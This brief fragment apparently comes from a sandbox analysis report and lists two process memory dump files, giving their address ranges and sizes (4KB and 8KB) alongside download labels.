4KB

Download
memory/1860-72-0x0000000001D20000-0x0000000001D21000-memory.dmp

Filesize
4KB

Download
memory/1956-71-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

Filesize
8KB

Download